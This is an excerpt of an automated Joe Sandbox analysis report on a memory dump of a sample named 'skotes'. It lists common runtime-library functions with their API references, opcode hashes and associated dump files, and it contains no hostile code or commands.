Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 00C0E959
Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 00C0E9DC

Memory Dump Source

Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Context$Base::$GroupScheduleSegment$AssignAvailableConcurrency::location::_EventInternalMakeProcessor::ReleaseRunnableTraceVirtual
String ID:
API String ID: 512098550-0
Opcode ID: a135723f914c6c3e4a5da6369805fa2ebcee07f9e01bcbbc055ffc56a72b3a66
Instruction ID: 989e857585caf1f770a8ece45837d25a4807fbc5dfe6efb613f773d8371697d2
Opcode Fuzzy Hash: a135723f914c6c3e4a5da6369805fa2ebcee07f9e01bcbbc055ffc56a72b3a66
Instruction Fuzzy Hash: 51414E35A00619EFCB09EF64C554AADBBB6FF48310F148159E916A73D0CB74AE01DF81

Function 00C0D2B9 Relevance: 7.6, APIs: 5, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::ReferenceCountedQuickBitSet::InterlockedSet.LIBCONCRT ref: 00C0D344
ListArray.LIBCONCRT ref: 00C0D367
Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 00C0D370
ListArray.LIBCONCRT ref: 00C0D3A8
Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 00C0D3B3

Memory Dump Source

Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$ArrayListVirtual$ActiveAvailableBase::CountedInterlockedMakeProcessorProcessor::QuickReferenceSchedulerSet::
String ID:
API String ID: 4212520697-0
Opcode ID: 98d89d95803ba35b0a19c1ce97aede244b681b1817aa158ffc4e13bafc774d33
Instruction ID: 920075cbfc0d125c74ed90ec4150b12639556175daeb093cc8ea235baa14bec7
Opcode Fuzzy Hash: 98d89d95803ba35b0a19c1ce97aede244b681b1817aa158ffc4e13bafc774d33
Instruction Fuzzy Hash: 68319E75700210EFCB05EF94C895BAEB7B6AF88310F144199E8069B3E2DB71ED41DB92

Function 00C086C9 Relevance: 7.6, APIs: 5, Instructions: 88COMMON

Download Yara Rule

APIs

_SpinWait.LIBCONCRT ref: 00C086EE

Part of subcall function 00BFEAD0: _SpinWait.LIBCONCRT ref: 00BFEAE8

Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 00C08702
Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00C08734
List.LIBCMT ref: 00C087B7
List.LIBCMT ref: 00C087C6

Memory Dump Source

Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
String ID:
API String ID: 3281396844-0
Opcode ID: 32fdfd073cf5ce65768082efae5e88950978cfea3804133fdc161dba36379350
Instruction ID: 6011f0f7a5ca16f47becc03f4d54e259e5b2d60e463dc091b767a946edba4256
Opcode Fuzzy Hash: 32fdfd073cf5ce65768082efae5e88950978cfea3804133fdc161dba36379350
Instruction Fuzzy Hash: 06318F31D05656DFCB14EFA8C5416EDB7B1BF04714F2480AAE59177296CF316E08CB94

Function 00C21ABC Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279COMMONLIBRARYCODE

Download Yara Rule

APIs

__dosmaperr.LIBCMT ref: 00C21BD7
__dosmaperr.LIBCMT ref: 00C21BF6
__dosmaperr.LIBCMT ref: 00C21D9C

Strings

H, xrefs: 00C21D21

Memory Dump Source

Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: __dosmaperr
String ID: H
API String ID: 2332233096-2852464175
Opcode ID: 21fd7219eb6a972796699378107c9866bed30a704a2a2a492da915e0ec1d5a15
Instruction ID: 6230406b5e1a9b4c94315f0c2197ab9822c1f99b6056d32ff1a9d9cba2f2c84e
Opcode Fuzzy Hash: 21fd7219eb6a972796699378107c9866bed30a704a2a2a492da915e0ec1d5a15
Instruction Fuzzy Hash: 9CA12732A141588FCF19DF68EC91BAE3BB1AF17320F180199EC11AB2D1DB358D52DB52

Function 00C1182A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 85COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 00C118A4
Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 00C118EB

Strings

pContext, xrefs: 00C1189C

Memory Dump Source

Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::FreeIdleProcessorRoot::SpinUntilVirtualstd::invalid_argument::invalid_argument
String ID: pContext
API String ID: 3390424672-2046700901
Opcode ID: 8532ceab9d8737195e092b407e7eefd5d09d05f0fca46cb6347a38af4d50e8c1
Instruction ID: 790d6eaaa0c74e7f5d887b2179c50dbece612cbb1f2820139ddcfd45f311b37f
Opcode Fuzzy Hash: 8532ceab9d8737195e092b407e7eefd5d09d05f0fca46cb6347a38af4d50e8c1
Instruction Fuzzy Hash: 6A214731B006159BDB14AB68C895AFC73A5BF82334B09412AEE11872D1CF7CED81EB80

Function 00C0AE65 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMON

Download Yara Rule

APIs

List.LIBCONCRT ref: 00C0AEEA
std::invalid_argument::invalid_argument.LIBCONCRT ref: 00C0AF0F
Concurrency::details::FreeVirtualProcessorRoot::FreeVirtualProcessorRoot.LIBCONCRT ref: 00C0AF4E

Strings

pExecutionResource, xrefs: 00C0AF07

Memory Dump Source

Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
